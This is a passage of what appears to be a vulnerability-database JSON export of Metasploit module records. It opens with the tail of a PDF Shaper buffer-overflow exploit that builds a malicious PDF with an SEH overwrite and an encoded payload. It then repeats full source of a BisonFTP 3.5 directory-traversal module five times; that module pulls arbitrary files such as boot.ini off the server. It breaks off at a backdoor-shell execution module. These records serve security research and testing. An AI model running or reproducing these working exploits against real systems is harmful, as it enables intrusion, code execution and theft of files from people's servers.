Shaper v.3.5 and v.3.6>',\n {\n 'Ret' => 0x00402AC1, # PDFTools.exe\n 'Offset' => 433\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Oct 03 2015',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('FILENAME', [false, 'The file name.', 'msf.pdf'])\n ], self.class\n )\n end\n\n def exploit\n file_create(make_pdf)\n end\n\n def jpeg\n buffer = \"\\xFF\\xD8\\xFF\\xEE\\x00\\x0E\\x41\\x64\\x6F\\x62\\x65\\x00\\x64\\x80\\x00\\x00\"\n buffer << \"\\x00\\x02\\xFF\\xDB\\x00\\x84\\x00\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\"\n buffer << \"\\x02\\x03\\x02\\x02\\x02\\x03\\x04\\x03\\x03\\x03\\x03\\x04\\x05\\x04\\x04\\x04\"\n buffer << \"\\x04\\x04\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x07\\x08\\x08\\x08\"\n buffer << \"\\x07\\x05\\x09\\x0A\\x0A\\x0A\\x0A\\x09\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\"\n buffer << \"\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x01\\x03\\x02\\x02\\x03\\x03\\x03\\x07\\x05\"\n buffer << \"\\x05\\x07\\x0D\\x0A\\x09\\x0A\\x0D\\x0F\\x0D\\x0D\\x0D\\x0D\\x0F\\x0F\\x0C\\x0C\"\n buffer << \"\\x0C\\x0C\\x0C\\x0F\\x0F\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0F\\x0C\\x0E\\x0E\\x0E\"\n buffer << \"\\x0E\\x0E\\x0C\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\"\n buffer << \"\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\xFF\\xC0\\x00\\x14\\x08\\x00\\x32\\x00\"\n buffer << \"\\xE6\\x04\\x01\\x11\\x00\\x02\\x11\\x01\\x03\\x11\\x01\\x04\\x11\\x00\\xFF\\xC4\"\n buffer << \"\\x01\\xA2\\x00\\x00\\x00\\x07\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\"\n buffer << \"\\x00\\x00\\x00\\x04\\x05\\x03\\x02\\x06\\x01\\x00\\x07\\x08\\x09\\x0A\\x0B\\x01\"\n buffer << \"\\x54\\x02\\x02\\x03\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n buffer << \"\\x01\\x00\\x02\\x03\\x04\\x05\\x06\\x07\"\n buffer << rand_text(target['Offset']) # junk\n buffer << generate_seh_record(target.ret)\n buffer << payload.encoded\n buffer << rand_text(2388 - payload.encoded.length)\n buffer\n end\n\n def make_pdf\n @pdf << header\n add_object(1, \"<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>\")\n add_object(2, \"<</Type/Outlines>>\")\n add_object(3, \"<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>\")\n add_object(4, \"[/PDF/Text/ImageC]\")\n add_object(5, \"<</Type/Page/Parent 3 0 R/Contents 6 0 R>>\")\n stream_1 = \"stream\" << eol\n stream_1 << \"0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q\" << eol\n stream_1 << \"endstream\" << eol\n add_object(6, \"<</Length 91>>#{stream_1}\")\n stream = \"<<\" << eol\n stream << \"/Width 230\" << eol\n stream << \"/BitsPerComponent 8\" << eol\n stream << \"/Name /X\" << eol\n stream << \"/Height 50\" << eol\n stream << \"/Intent /RelativeColorimetric\" << eol\n stream << \"/Subtype /Image\" << eol\n stream << \"/Filter /DCTDecode\" << eol\n stream << \"/Length #{jpeg.length}\" << eol\n stream << \"/ColorSpace /DeviceCMYK\" << eol\n stream << \"/Type /XObject\" << eol\n stream << \">>\"\n stream << \"stream\" << eol\n stream << jpeg << eol\n stream << \"endstream\" << eol\n add_object(7, stream)\n finish_pdf\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-13T23:51:01", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 97}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "59a376e9ba7a4108fbda54f00d9010b2", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2019-10-03T16:47:49", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-14T01:35:28", "history": [], "viewCount": 52, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-14T01:35:28"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-10-14T01:35:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-14T01:35:28", "differentElements": ["modified", "published"], "edition": 98}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6ca196d549fd238df143ba70fad1099a", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-15T03:35:46", "history": [], "viewCount": 52, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-15T03:35:46"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-10-15T03:35:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-15T03:35:46", "differentElements": ["modified", "published"], "edition": 99}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "59a376e9ba7a4108fbda54f00d9010b2", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2019-10-03T16:47:49", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-15T05:35:01", "history": [], "viewCount": 80, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-15T05:35:01"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-10-15T05:35:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-15T05:35:01", "differentElements": ["modified", "published"], "edition": 100}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6ca196d549fd238df143ba70fad1099a", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-22T01:36:35", "history": [], "viewCount": 80, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-22T01:36:35"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-10-22T01:36:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-22T01:36:35", "differentElements": ["modified", "published"], "edition": 101}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "59a376e9ba7a4108fbda54f00d9010b2", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2019-10-03T16:47:49", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-22T03:44:49", "history": [], "viewCount": 85, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-22T03:44:49"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-10-22T03:44:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-22T03:44:49", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 102}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "27bddcd8a2ba3e855182a2bdf109115e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Simple Backdoor Shell Remote Code Execution", "description": "This module exploits unauthenticated simple web backdoor shells by leveraging the common backdoor shell's vulnerable parameter to execute commands. The SecLists project of Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells which is categorized under Payloads.\n", "published": "2015-09-08T05:08:47", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://resources.infosecinstitute.com/checking-out-backdoor-shells/", "https://github.com/danielmiessler/SecLists/tree/master/Payloads"], "cvelist": [], "lastseen": "2019-10-23T20:04:18", "history": [], "viewCount": 85, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2019-10-23T20:04:18"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310704548", "OPENVAS:1361412562310704547", "OPENVAS:1361412562310143041", "OPENVAS:1361412562310143042", "OPENVAS:1361412562310891968", "OPENVAS:1361412562310108682", "OPENVAS:1361412562310891967", "OPENVAS:1361412562310891961", "OPENVAS:1361412562310891962", "OPENVAS:1361412562310113545"]}, {"type": "threatpost", "idList": ["THREATPOST:9BC1B113CDD3C86D30DEB5648D4DB177"]}, {"type": "tenable", "idList": ["TENABLE:0233D53A82E16C59E35C51B21491BD62"]}, {"type": "redhat", "idList": ["RHSA-2019:3168"]}, {"type": "thn", "idList": ["THN:9269E53DB7E4D99ED8A3314F02869A30"]}, {"type": "symantec", "idList": ["SMNTC-110570"]}, {"type": "mozilla", "idList": ["MFSA2019-34", "MFSA2019-33"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:F049AE2BB0739D7D9D8E368907DF1C29"]}], "modified": "2019-10-23T20:04:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/simple_backdoors_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 